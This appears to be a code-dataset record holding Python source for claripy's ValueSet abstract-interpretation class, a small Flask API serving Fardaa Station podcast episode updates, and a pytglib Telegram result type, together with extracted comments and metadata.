def _set_si(self, region, region_base_addr, si):
if isinstance(si, numbers.Number):
si = StridedInterval(bits=self.bits, stride=0, lower_bound=si, upper_bound=si)
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if not isinstance(si, StridedInterval):
raise ClaripyVSAOperationError('Unsupported type %s for si' % type(si))
self._regions[region] = si
self._region_base_addrs[region] = region_base_addr
self._si = self._si.union(region_base_addr + si)
def _merge_si(self, region, region_base_addr, si):
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if region not in self._regions:
self._set_si(region, region_base_addr, si)
else:
self._regions[region] = self._regions[region].union(si)
self._region_base_addrs[region] = self._region_base_addrs[region].union(region_base_addr)
self._si = self._si.union(region_base_addr + si)
#
# Public methods
#
@staticmethod
def empty(bits):
return ValueSet(bits=bits)
def items(self):
return self._regions.items()
def size(self):
return len(self)
def copy(self):
"""
Make a copy of self and return.
:return: A new ValueSet object.
:rtype: ValueSet
"""
vs = ValueSet(bits=self.bits)
vs._regions = self._regions.copy()
vs._region_base_addrs = self._region_base_addrs.copy()
vs._reversed = self._reversed
vs._si = self._si.copy()
return vs
def get_si(self, region):
if region in self._regions:
return self._regions[region]
# TODO: Should we return a None, or an empty SI instead?
return None
def stridedinterval(self):
return self._si
def apply_annotation(self, annotation):
"""
Apply a new annotation onto self, and return a new ValueSet object.
:param RegionAnnotation annotation: The annotation to apply.
:return: A new ValueSet object
:rtype: ValueSet
"""
vs = self.copy()
vs._merge_si(annotation.region_id, annotation.region_base_addr, annotation.offset)
return vs
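    # Illustrative sketch, not part of the original file: folding a second region
    # into an existing value set through an annotation (concrete values made up).
    #
    #   vs2 = vs.apply_annotation(RegionAnnotation('heap', 0x8000000, offset_si))
    #   sorted(vs2.regions)   # e.g. ['global', 'heap']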
def __repr__(self):
        s = ", ".join("%s: %s" % (region, si) for region, si in self._regions.items())
        return "(" + s + ")"
def __len__(self):
return self._bits
def __hash__(self):
return hash(tuple((r, hash(self._regions[r])) for r in self._regions))
#
# Arithmetic operations
#
@normalize_types_one_arg
def __add__(self, other):
"""
Binary operation: addition
        Note that even if "other" is a ValueSet object, we still treat it as a StridedInterval. Adding two ValueSets
together does not make sense (which is essentially adding two pointers together).
:param StridedInterval other: The other operand.
:return: A new ValueSet object
:rtype: ValueSet
"""
new_vs = ValueSet(bits=self.bits)
# Call __add__ on self._si
new_vs._si = self._si.__add__(other)
for region in self._regions:
new_vs._regions[region] = self._regions[region] + other
return new_vs
@normalize_types_one_arg
def __radd__(self, other):
return self.__add__(other)
@normalize_types_one_arg
def __sub__(self, other):
"""
Binary operation: subtraction
:param other: The other operand
:return: A StridedInterval or a ValueSet.
"""
deltas = [ ]
# TODO: Handle more cases
if isinstance(other, ValueSet):
# A subtraction between two ValueSets produces a StridedInterval
if self.regions.keys() == other.regions.keys():
for region in self._regions:
deltas.append(self._regions[region] - other._regions[region])
else:
# TODO: raise the proper exception here
raise NotImplementedError()
delta = StridedInterval.empty(self.bits)
for d in deltas:
delta = delta.union(d)
return delta
else:
# A subtraction between a ValueSet and a StridedInterval produces another ValueSet
new_vs = self.copy()
# Call __sub__ on the base class
new_vs._si = self._si.__sub__(other)
for region, si in new_vs._regions.items():
new_vs._regions[region] = si - other
return new_vs
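    # Illustrative sketch, not part of the original file: subtracting two value
    # sets over the same regions yields a plain StridedInterval (a pointer
    # difference), while subtracting a StridedInterval keeps the ValueSet shape.
    #
    #   delta = vs_a - vs_b   # StridedInterval, assuming identical region keys
    #   moved = vs_a - si_4   # ValueSet with every region offset shifted down by 4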
@normalize_types_one_arg
def __and__(self, other):
"""
Binary operation: and
Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between
        two pointers that are not the same does not make sense.
:param other: The other operand
:return: A ValueSet as the result
:rtype: ValueSet
"""
if type(other) is ValueSet:
            # The only case where calling & between two pointers makes sense
if self.identical(other):
return self.copy()
if BoolResult.is_true(other == 0):
# Corner case: a & 0 = 0
return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0)
if BoolResult.is_true(other < 0x100):
# Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not
# We return a StridedInterval instead
ret = None
for region, si in self._regions.items():
r = si.__and__(other)
ret = r if ret is None else ret.union(r)
return ret
else:
# We should return a ValueSet here
new_vs = self.copy()
for region, si in self._regions.items():
r = si.__and__(other)
new_vs._regions[region] = r
return new_vs
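    # Illustrative sketch, not part of the original file: the small-mask special
    # case above is what makes alignment tests work (the mask below is assumed
    # to be a StridedInterval smaller than 0x100).
    #
    #   low_bits = ptr_vs & mask_0xf   # returns a StridedInterval, not a ValueSet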
def __eq__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
if isinstance(other, ValueSet):
same = False
different = False
for region, si in other.regions.items():
if region in self.regions:
comp_ret = self.regions[region] == si
if BoolResult.has_true(comp_ret):
same = True
if BoolResult.has_false(comp_ret):
different = True
else:
different = True
if same and not different:
return TrueResult()
if same and different:
return MaybeResult()
return FalseResult()
elif isinstance(other, StridedInterval):
if 'global' in self.regions:
return self.regions['global'] == other
else:
return FalseResult()
else:
return FalseResult()
def __ne__(self, other):
"""
        Binary operation: !=
:param other: The other operand
:return: True/False/Maybe
"""
return ~ (self == other)
#
# Backend operations
#
def eval(self, n, signed=False):
if signed:
# How are you going to deal with a negative pointer?
raise ClaripyVSAOperationError('`signed` cannot be True when calling ValueSet.eval().')
results = []
for _, si in self._regions.items():
if len(results) < n:
results.extend(si.eval(n))
return results
@property
def min(self):
"""
The minimum integer value of a value-set. It is only defined when there is exactly one region.
        :return: An integer that represents the minimum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
            raise ClaripyVSAOperationError("'min()' only works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).min
@property
def max(self):
"""
The maximum integer value of a value-set. It is only defined when there is exactly one region.
        :return: An integer that represents the maximum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
            raise ClaripyVSAOperationError("'max()' only works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).max
def reverse(self):
# TODO: obviously valueset.reverse is not properly implemented. I'm disabling the old annoying output line for
# TODO: now. I will implement the proper reversing support soon.
vs = self.copy()
vs._reversed = not vs._reversed
return vs
def extract(self, high_bit, low_bit):
"""
Operation extract
- A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a
ValueSet instance. Otherwise a StridedInterval is returned.
:param high_bit:
:param low_bit:
:return: A ValueSet or a StridedInterval
"""
if high_bit - low_bit + 1 == self.bits:
return self.copy()
if ('global' in self._regions and len(self._regions.keys()) > 1) or \
len(self._regions.keys()) > 0:
si_ret = StridedInterval.top(high_bit - low_bit + 1)
else:
if 'global' in self._regions:
si = self._regions['global']
si_ret = si.extract(high_bit, low_bit)
else:
si_ret = StridedInterval.empty(high_bit - low_bit + 1)
return si_ret
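    # Illustrative sketch, not part of the original file: extracting the full
    # width hands back a ValueSet copy, anything narrower degrades to a
    # StridedInterval.
    #
    #   vs.extract(31, 0)   # ValueSet copy (full 32 bits)
    #   vs.extract(7, 0)    # StridedInterval (low byte only)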
def concat(self, b):
new_vs = ValueSet(bits=self.bits + b.bits)
# TODO: This logic is obviously flawed. Correct it later :-(
if isinstance(b, StridedInterval):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b))
elif isinstance(b, ValueSet):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b.get_si(region)))
else:
raise ClaripyVSAOperationError('ValueSet.concat() got an unsupported operand %s (type %s)' % (b, type(b)))
return new_vs
@normalize_types_one_arg
def union(self, b):
merged_vs = self.copy()
if type(b) is ValueSet:
for region, si in b.regions.items():
if region not in merged_vs._regions:
merged_vs._regions[region] = si
else:
merged_vs._regions[region] = merged_vs._regions[region].union(si)
merged_vs._si = merged_vs._si.union(b._si)
else:
for region, si in merged_vs._regions.items():
merged_vs._regions[region] = merged_vs._regions[region].union(b)
merged_vs._si = merged_vs._si.union(b)
return merged_vs
@normalize_types_one_arg
def widen(self, b):
merged_vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in merged_vs.regions:
merged_vs.regions[region] = si
else:
merged_vs.regions[region] = merged_vs.regions[region].widen(si)
merged_vs._si = merged_vs._si.widen(b._si)
else:
for region in merged_vs._regions:
merged_vs._regions[region] = merged_vs._regions[region].widen(b)
merged_vs._si = merged_vs._si.widen(b)
return merged_vs
@normalize_types_one_arg
def intersection(self, b):
vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in vs.regions:
pass
else:
vs.regions[region] = vs.regions[region].intersection(si)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b._si)
else:
for region in self._regions:
vs.regions[region] = vs.regions[region].intersection(b)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b)
return vs
def identical(self, o):
"""
Used to make exact comparisons between two ValueSets.
:param o: The other ValueSet to compare with.
:return: True if they are exactly same, False otherwise.
"""
if self._reversed != o._reversed:
return False
for region, si in self.regions.items():
if region in o.regions:
o_si = o.regions[region]
if not si.identical(o_si):
return False
else:
return False
return True
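    # Illustrative sketch, not part of the original file: identical() is an exact
    # structural comparison, while __eq__ returns a tri-state BoolResult.
    #
    #   vs.identical(vs.copy())   # True
    #   vs == vs.copy()           # TrueResult()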
from ..ast.base import Base
from .strided_interval import StridedInterval
from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult
from .errors import ClaripyVSAOperationError, ClaripyVSAError
from ..errors import ClaripyValueError
| import functools
import itertools
import numbers
from ..backend_object import BackendObject
from ..annotation import Annotation
def normalize_types_two_args(f):
@functools.wraps(f)
def normalizer(self, region, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
if not isinstance(o, StridedInterval):
raise ClaripyVSAOperationError('Unsupported operand type %s' % type(o))
return f(self, region, o)
return normalizer
def normalize_types_one_arg(f):
@functools.wraps(f)
def normalizer(self, o):
"""
Convert any object to an object that we can process.
"""
if isinstance(o, Base):
raise ClaripyValueError("BoolResult can't handle AST objects directly")
return f(self, o)
return normalizer
vs_id_ctr = itertools.count()
class RegionAnnotation(Annotation):
"""
Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet.
    Note that Annotation objects are immutable. Do not modify the properties of an existing Annotation object; create a
    new one instead.
"""
def __init__(self, region_id, region_base_addr, offset):
self.region_id = region_id
self.region_base_addr = region_base_addr
self.offset = offset
# Do necessary conversion here
if isinstance(self.region_base_addr, Base):
self.region_base_addr = self.region_base_addr._model_vsa
if isinstance(self.offset, Base):
self.offset = self.offset._model_vsa
@property
def eliminatable(self):
"""
A Region annotation is not eliminatable in simplifications.
:return: False
:rtype: bool
"""
return False
@property
def relocatable(self):
"""
A Region annotation is not relocatable in simplifications.
:return: False
:rtype: bool
"""
return False
#
# Public methods
#
def relocate(self, src, dst):
"""
Override Annotation.relocate().
:param src: The old AST
:param dst: The new AST, as the result of a simplification
:return: The new annotation that should be applied on the new AST
"""
raise ClaripyVSAError('RegionAnnotation is not relocatable')
#
# Overriding base methods
#
def __hash__(self):
return hash((self.region_id, self.region_base_addr, hash(self.offset)))
def __repr__(self):
return "<RegionAnnotation %s:%#08x>" % (self.region_id, self.offset)
class ValueSet(BackendObject):
"""
ValueSet is a mapping between memory regions and corresponding offsets.
"""
def __init__(self, name=None, region=None, region_base_addr=None, bits=None, val=None):
"""
Constructor.
:param str name: Name of this ValueSet object. Only for debugging purposes.
:param str region: Region ID.
:param int region_base_addr: Base address of the region.
:param int bits: Size of the ValueSet.
:param val: an initial offset
"""
self._name = 'VS_%d' % next(vs_id_ctr) if name is None else name
if bits is None:
raise ClaripyVSAError('bits must be specified when creating a ValueSet.')
self._bits = bits
self._si = StridedInterval.empty(bits)
self._regions = {}
self._region_base_addrs = {}
self._reversed = False
# Shortcuts for initialization
# May not be useful though...
if region is not None and region_base_addr is not None and val is not None:
if isinstance(region_base_addr, numbers.Number):
# Convert it to a StridedInterval
region_base_addr = StridedInterval(bits=self._bits, stride=1,
lower_bound=region_base_addr,
upper_bound=region_base_addr)
if isinstance(val, numbers.Number):
val = StridedInterval(bits=bits, stride=0, lower_bound=val, upper_bound=val)
if isinstance(val, StridedInterval):
self._set_si(region, region_base_addr, val)
else:
raise ClaripyVSAError("Unsupported type '%s' for argument 'val'" % type(val))
else:
if region is not None or val is not None:
raise ClaripyVSAError("You must specify 'region' and 'val' at the same time.")
#
# Properties
#
@property
def name(self):
return self._name
@property
def bits(self):
return self._bits
@property
def regions(self):
return self._regions
@property
def reversed(self):
return self._reversed
@property
def unique(self):
        return len(self.regions) == 1 and next(iter(self.regions.values())).unique
@property
def cardinality(self):
card = 0
for region in self._regions:
card += self._regions[region].cardinality
return card
@property
def is_empty(self):
return len(self._regions) == 0
@property
def valueset(self):
return self
#
# Private methods
#
def _set_si(self, region, region_base_addr, si):
if isinstance(si, numbers.Number):
si = StridedInterval(bits=self.bits, stride=0, lower_bound=si, upper_bound=si)
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if not isinstance(si, StridedInterval):
raise ClaripyVSAOperationError('Unsupported type %s for si' % type(si))
self._regions[region] = si
self._region_base_addrs[region] = region_base_addr
self._si = self._si.union(region_base_addr + si)
def _merge_si(self, region, region_base_addr, si):
if isinstance(region_base_addr, numbers.Number):
region_base_addr = StridedInterval(bits=self.bits, stride=0, lower_bound=region_base_addr,
upper_bound=region_base_addr
)
if region not in self._regions:
self._set_si(region, region_base_addr, si)
else:
self._regions[region] = self._regions[region].union(si)
self._region_base_addrs[region] = self._region_base_addrs[region].union(region_base_addr)
self._si = self._si.union(region_base_addr + si)
#
# Public methods
#
@staticmethod
def empty(bits):
return ValueSet(bits=bits)
def items(self):
return self._regions.items()
def size(self):
return len(self)
def copy(self):
"""
Make a copy of self and return.
:return: A new ValueSet object.
:rtype: ValueSet
"""
vs = ValueSet(bits=self.bits)
vs._regions = self._regions.copy()
vs._region_base_addrs = self._region_base_addrs.copy()
vs._reversed = self._reversed
vs._si = self._si.copy()
return vs
def get_si(self, region):
if region in self._regions:
return self._regions[region]
# TODO: Should we return a None, or an empty SI instead?
return None
def stridedinterval(self):
return self._si
def apply_annotation(self, annotation):
"""
Apply a new annotation onto self, and return a new ValueSet object.
:param RegionAnnotation annotation: The annotation to apply.
:return: A new ValueSet object
:rtype: ValueSet
"""
vs = self.copy()
vs._merge_si(annotation.region_id, annotation.region_base_addr, annotation.offset)
return vs
def __repr__(self):
        s = ", ".join("%s: %s" % (region, si) for region, si in self._regions.items())
        return "(" + s + ")"
def __len__(self):
return self._bits
def __hash__(self):
return hash(tuple((r, hash(self._regions[r])) for r in self._regions))
#
# Arithmetic operations
#
@normalize_types_one_arg
def __add__(self, other):
"""
Binary operation: addition
        Note that even if "other" is a ValueSet object, we still treat it as a StridedInterval. Adding two ValueSets
together does not make sense (which is essentially adding two pointers together).
:param StridedInterval other: The other operand.
:return: A new ValueSet object
:rtype: ValueSet
"""
new_vs = ValueSet(bits=self.bits)
# Call __add__ on self._si
new_vs._si = self._si.__add__(other)
for region in self._regions:
new_vs._regions[region] = self._regions[region] + other
return new_vs
@normalize_types_one_arg
def __radd__(self, other):
return self.__add__(other)
@normalize_types_one_arg
def __sub__(self, other):
"""
Binary operation: subtraction
:param other: The other operand
:return: A StridedInterval or a ValueSet.
"""
deltas = [ ]
# TODO: Handle more cases
if isinstance(other, ValueSet):
# A subtraction between two ValueSets produces a StridedInterval
if self.regions.keys() == other.regions.keys():
for region in self._regions:
deltas.append(self._regions[region] - other._regions[region])
else:
# TODO: raise the proper exception here
raise NotImplementedError()
delta = StridedInterval.empty(self.bits)
for d in deltas:
delta = delta.union(d)
return delta
else:
# A subtraction between a ValueSet and a StridedInterval produces another ValueSet
new_vs = self.copy()
# Call __sub__ on the base class
new_vs._si = self._si.__sub__(other)
for region, si in new_vs._regions.items():
new_vs._regions[region] = si - other
return new_vs
@normalize_types_one_arg
def __and__(self, other):
"""
Binary operation: and
Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between
        two pointers that are not the same does not make sense.
:param other: The other operand
:return: A ValueSet as the result
:rtype: ValueSet
"""
if type(other) is ValueSet:
            # The only case where calling & between two pointers makes sense
if self.identical(other):
return self.copy()
if BoolResult.is_true(other == 0):
# Corner case: a & 0 = 0
return StridedInterval(bits=self.bits, stride=0, lower_bound=0, upper_bound=0)
if BoolResult.is_true(other < 0x100):
# Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not
# We return a StridedInterval instead
ret = None
for region, si in self._regions.items():
r = si.__and__(other)
ret = r if ret is None else ret.union(r)
return ret
else:
# We should return a ValueSet here
new_vs = self.copy()
for region, si in self._regions.items():
r = si.__and__(other)
new_vs._regions[region] = r
return new_vs
def __eq__(self, other):
"""
Binary operation: ==
:param other: The other operand
:return: True/False/Maybe
"""
if isinstance(other, ValueSet):
same = False
different = False
for region, si in other.regions.items():
if region in self.regions:
comp_ret = self.regions[region] == si
if BoolResult.has_true(comp_ret):
same = True
if BoolResult.has_false(comp_ret):
different = True
else:
different = True
if same and not different:
return TrueResult()
if same and different:
return MaybeResult()
return FalseResult()
elif isinstance(other, StridedInterval):
if 'global' in self.regions:
return self.regions['global'] == other
else:
return FalseResult()
else:
return FalseResult()
def __ne__(self, other):
"""
        Binary operation: !=
:param other: The other operand
:return: True/False/Maybe
"""
return ~ (self == other)
#
# Backend operations
#
def eval(self, n, signed=False):
if signed:
# How are you going to deal with a negative pointer?
raise ClaripyVSAOperationError('`signed` cannot be True when calling ValueSet.eval().')
results = []
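        # Gather concrete values region by region; the loop stops adding once at least
        # n values have been collected, so the result may contain more than n entries.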
for _, si in self._regions.items():
if len(results) < n:
results.extend(si.eval(n))
return results
@property
def min(self):
"""
The minimum integer value of a value-set. It is only defined when there is exactly one region.
        :return: An integer that represents the minimum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'min()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).min
@property
def max(self):
"""
The maximum integer value of a value-set. It is only defined when there is exactly one region.
        :return: An integer that represents the maximum integer value of this value-set.
:rtype: int
"""
if len(self.regions) != 1:
raise ClaripyVSAOperationError("'max()' onlly works on single-region value-sets.")
return self.get_si(next(iter(self.regions))).max
def reverse(self):
# TODO: obviously valueset.reverse is not properly implemented. I'm disabling the old annoying output line for
# TODO: now. I will implement the proper reversing support soon.
vs = self.copy()
vs._reversed = not vs._reversed
return vs
def extract(self, high_bit, low_bit):
"""
Operation extract
- A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a
ValueSet instance. Otherwise a StridedInterval is returned.
:param high_bit:
:param low_bit:
:return: A ValueSet or a StridedInterval
"""
if high_bit - low_bit + 1 == self.bits:
return self.copy()
if ('global' in self._regions and len(self._regions.keys()) > 1) or \
len(self._regions.keys()) > 0:
si_ret = StridedInterval.top(high_bit - low_bit + 1)
else:
if 'global' in self._regions:
si = self._regions['global']
si_ret = si.extract(high_bit, low_bit)
else:
si_ret = StridedInterval.empty(high_bit - low_bit + 1)
return si_ret
def concat(self, b):
new_vs = ValueSet(bits=self.bits + b.bits)
# TODO: This logic is obviously flawed. Correct it later :-(
if isinstance(b, StridedInterval):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b))
elif isinstance(b, ValueSet):
for region, si in self._regions.items():
new_vs._set_si(region, self._region_base_addrs[region], si.concat(b.get_si(region)))
else:
raise ClaripyVSAOperationError('ValueSet.concat() got an unsupported operand %s (type %s)' % (b, type(b)))
return new_vs
@normalize_types_one_arg
def union(self, b):
merged_vs = self.copy()
if type(b) is ValueSet:
for region, si in b.regions.items():
if region not in merged_vs._regions:
merged_vs._regions[region] = si
else:
merged_vs._regions[region] = merged_vs._regions[region].union(si)
merged_vs._si = merged_vs._si.union(b._si)
else:
for region, si in merged_vs._regions.items():
merged_vs._regions[region] = merged_vs._regions[region].union(b)
merged_vs._si = merged_vs._si.union(b)
return merged_vs
@normalize_types_one_arg
def widen(self, b):
merged_vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in merged_vs.regions:
merged_vs.regions[region] = si
else:
merged_vs.regions[region] = merged_vs.regions[region].widen(si)
merged_vs._si = merged_vs._si.widen(b._si)
else:
for region in merged_vs._regions:
merged_vs._regions[region] = merged_vs._regions[region].widen(b)
merged_vs._si = merged_vs._si.widen(b)
return merged_vs
@normalize_types_one_arg
def intersection(self, b):
vs = self.copy()
if isinstance(b, ValueSet):
for region, si in b.regions.items():
if region not in vs.regions:
pass
else:
vs.regions[region] = vs.regions[region].intersection(si)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b._si)
else:
for region in self._regions:
vs.regions[region] = vs.regions[region].intersection(b)
if vs.regions[region].is_empty:
del vs.regions[region]
vs._si = vs._si.intersection(b)
return vs
def identical(self, o):
"""
Used to make exact comparisons between two ValueSets.
:param o: The other ValueSet to compare with.
        :return: True if they are exactly the same, False otherwise.
"""
if self._reversed != o._reversed:
return False
for region, si in self.regions.items():
if region in o.regions:
o_si = o.regions[region]
if not si.identical(o_si):
return False
else:
return False
return True
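# Illustrative usage sketch (not part of the original module; keyword names follow the
# constructor parameters documented above, and the concrete addresses are made up):
#
#   vs = ValueSet(bits=32, region='stack', region_base_addr=0x7fff0000, val=0x10)
#   vs2 = vs + 4               # shifts the offset inside every region
#   si = vs.get_si('stack')    # StridedInterval of offsets stored for that region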
from ..ast.base import Base
from .strided_interval import StridedInterval
from .bool_result import BoolResult, TrueResult, FalseResult, MaybeResult
from .errors import ClaripyVSAOperationError, ClaripyVSAError
from ..errors import ClaripyValueError
| en | 0.811738 | Convert any object to an object that we can process. Convert any object to an object that we can process. Use RegionAnnotation to annotate ASTs. Normally, an AST annotated by RegionAnnotations is treated as a ValueSet. Note that Annotation objects are immutable. Do not change properties of an Annotation object without creating a new one. # Do necessary conversion here A Region annotation is not eliminatable in simplifications. :return: False :rtype: bool A Region annotation is not relocatable in simplifications. :return: False :rtype: bool # # Public methods # Override Annotation.relocate(). :param src: The old AST :param dst: The new AST, as the result of a simplification :return: The new annotation that should be applied on the new AST # # Overriding base methods # #08x>" % (self.region_id, self.offset) ValueSet is a mapping between memory regions and corresponding offsets. Constructor. :param str name: Name of this ValueSet object. Only for debugging purposes. :param str region: Region ID. :param int region_base_addr: Base address of the region. :param int bits: Size of the ValueSet. :param val: an initial offset # Shortcuts for initialization # May not be useful though... # Convert it to a StridedInterval # # Properties # # # Private methods # # # Public methods # Make a copy of self and return. :return: A new ValueSet object. :rtype: ValueSet # TODO: Should we return a None, or an empty SI instead? Apply a new annotation onto self, and return a new ValueSet object. :param RegionAnnotation annotation: The annotation to apply. :return: A new ValueSet object :rtype: ValueSet # # Arithmetic operations # Binary operation: addition Note that even if "other" is a ValueSet object. we still treat it as a StridedInterval. Adding two ValueSets together does not make sense (which is essentially adding two pointers together). :param StridedInterval other: The other operand. :return: A new ValueSet object :rtype: ValueSet # Call __add__ on self._si Binary operation: subtraction :param other: The other operand :return: A StridedInterval or a ValueSet. # TODO: Handle more cases # A subtraction between two ValueSets produces a StridedInterval # TODO: raise the proper exception here # A subtraction between a ValueSet and a StridedInterval produces another ValueSet # Call __sub__ on the base class Binary operation: and Note that even if `other` is a ValueSet object, it will be treated as a StridedInterval as well. Doing & between two pointers that are not the same do not make sense. :param other: The other operand :return: A ValueSet as the result :rtype: ValueSet # The only case where calling & between two points makes sense # Corner case: a & 0 = 0 # Special case - sometimes (addr & mask) is used for testing whether the address is aligned or not # We return a StridedInterval instead # We should return a ValueSet here Binary operation: == :param other: The other operand :return: True/False/Maybe Binary operation: == :param other: The other operand :return: True/False/Maybe # # Backend operations # # How are you going to deal with a negative pointer? The minimum integer value of a value-set. It is only defined when there is exactly one region. :return: A integer that represents the minimum integer value of this value-set. :rtype: int The maximum integer value of a value-set. It is only defined when there is exactly one region. :return: A integer that represents the maximum integer value of this value-set. :rtype: int # TODO: obviously valueset.reverse is not properly implemented. 
I'm disabling the old annoying output line for # TODO: now. I will implement the proper reversing support soon. Operation extract - A cheap hack is implemented: a copy of self is returned if (high_bit - low_bit + 1 == self.bits), which is a ValueSet instance. Otherwise a StridedInterval is returned. :param high_bit: :param low_bit: :return: A ValueSet or a StridedInterval # TODO: This logic is obviously flawed. Correct it later :-( Used to make exact comparisons between two ValueSets. :param o: The other ValueSet to compare with. :return: True if they are exactly same, False otherwise. | 2.622855 | 3 |
fardaastationapi.py | sina-cb/fardaastationapi | 0 | 8070 | import logging
from episodes import find_updates, db, count_all
from logging import error as logi
from flask import Flask, jsonify, request
def create_app(config, debug=False, testing=False, config_overrides=None):
app = Flask(__name__)
app.config.from_object(config)
app.config['JSON_AS_ASCII'] = False
app.debug = debug
app.testing = testing
if config_overrides:
app.config.update(config_overrides)
# Configure logging
if not app.testing:
logging.basicConfig(level=logging.INFO)
@app.before_request
def before_request():
db.connect()
@app.after_request
def after_request(response):
db.close()
return response
@app.route('/get_new_episodes')
def get_new_episodes():
appengine_request = request.headers.get('X-Appengine-Cron')
if appengine_request == 'true':
from scraper import update_episodes
update_episodes()
return '<h1>Success</h1>'
else:
            return '<h1>This is a cron job and all requests should come from App Engine.</h1>'
@app.route('/get_updates')
def get_update():
timestamp = request.args.get('timestamp', '')
if timestamp == '':
logi('Default timestamp')
timestamp = 0
else:
timestamp = long(timestamp)
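            # NOTE: long() exists only on Python 2; a Python 3 port would use int() here.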
result = find_updates(timestamp)
return jsonify(result)
@app.route('/')
def welcome():
message = '{}{}{}{}'.format('<h1>Welcome to FardaStationAPI WebService</h1>',
'<p>To get information about the latest episodes of Fardaa Station (by '
'RadioFarda.com) please send a GET request to '
'http://fardastationapi.appspot.com/get_updates URL.</p>',
'<p>A UNIX epoch timestamp can also be passed in as an argument to filter out the '
'episodes before that timestamp. Example: '
'https://fardastationapi.appspot.com/get_updates?timestamp=1512629949</p>',
'<h1>Current number of episodes: {}</h1>'.format(count_all()))
return message
# Add an error handler. This is useful for debugging the live application,
# however, you should disable the output of the exception for production
# applications.
@app.errorhandler(500)
def server_error(e):
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
return app
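# Illustrative local-run sketch (not part of the original file; 'settings' stands in for
# whatever config object the deployment passes to app.config.from_object):
#
#   app = create_app(config='settings', debug=True)
#   app.run(host='127.0.0.1', port=8080)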
| import logging
from episodes import find_updates, db, count_all
from logging import error as logi
from flask import Flask, jsonify, request
def create_app(config, debug=False, testing=False, config_overrides=None):
app = Flask(__name__)
app.config.from_object(config)
app.config['JSON_AS_ASCII'] = False
app.debug = debug
app.testing = testing
if config_overrides:
app.config.update(config_overrides)
# Configure logging
if not app.testing:
logging.basicConfig(level=logging.INFO)
@app.before_request
def before_request():
db.connect()
@app.after_request
def after_request(response):
db.close()
return response
@app.route('/get_new_episodes')
def get_new_episodes():
appengine_request = request.headers.get('X-Appengine-Cron')
if appengine_request == 'true':
from scraper import update_episodes
update_episodes()
return '<h1>Success</h1>'
else:
            return '<h1>This is a cron job and all requests should come from App Engine.</h1>'
@app.route('/get_updates')
def get_update():
timestamp = request.args.get('timestamp', '')
if timestamp == '':
logi('Default timestamp')
timestamp = 0
else:
timestamp = long(timestamp)
result = find_updates(timestamp)
return jsonify(result)
@app.route('/')
def welcome():
message = '{}{}{}{}'.format('<h1>Welcome to FardaStationAPI WebService</h1>',
'<p>To get information about the latest episodes of Fardaa Station (by '
'RadioFarda.com) please send a GET request to '
'http://fardastationapi.appspot.com/get_updates URL.</p>',
'<p>A UNIX epoch timestamp can also be passed in as an argument to filter out the '
'episodes before that timestamp. Example: '
'https://fardastationapi.appspot.com/get_updates?timestamp=1512629949</p>',
'<h1>Current number of episodes: {}</h1>'.format(count_all()))
return message
# Add an error handler. This is useful for debugging the live application,
# however, you should disable the output of the exception for production
# applications.
@app.errorhandler(500)
def server_error(e):
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
return app
| en | 0.809759 | # Configure logging # Add an error handler. This is useful for debugging the live application, # however, you should disable the output of the exception for production # applications. An internal error occurred: <pre>{}</pre> See logs for full stacktrace. | 2.239657 | 2 |
pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py | iTeam-co/pytglib | 6 | 8071 | <filename>pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py
from ..utils import Object
class CanTransferOwnershipResultPasswordTooFresh(Object):
"""
The 2-step verification was enabled recently, user needs to wait
Attributes:
ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh``
Args:
retry_after (:obj:`int`):
Time left before the session can be used to transfer ownership of a chat, in seconds
Returns:
CanTransferOwnershipResult
Raises:
:class:`telegram.Error`
"""
ID = "canTransferOwnershipResultPasswordTooFresh"
def __init__(self, retry_after, **kwargs):
self.retry_after = retry_after # int
@staticmethod
def read(q: dict, *args) -> "CanTransferOwnershipResultPasswordTooFresh":
retry_after = q.get('retry_after')
return CanTransferOwnershipResultPasswordTooFresh(retry_after)
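# Illustrative round-trip sketch (not part of the original file):
#
#   obj = CanTransferOwnershipResultPasswordTooFresh.read({'retry_after': 3600})
#   obj.retry_after  # -> 3600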
| <filename>pytglib/api/types/can_transfer_ownership_result_password_too_fresh.py
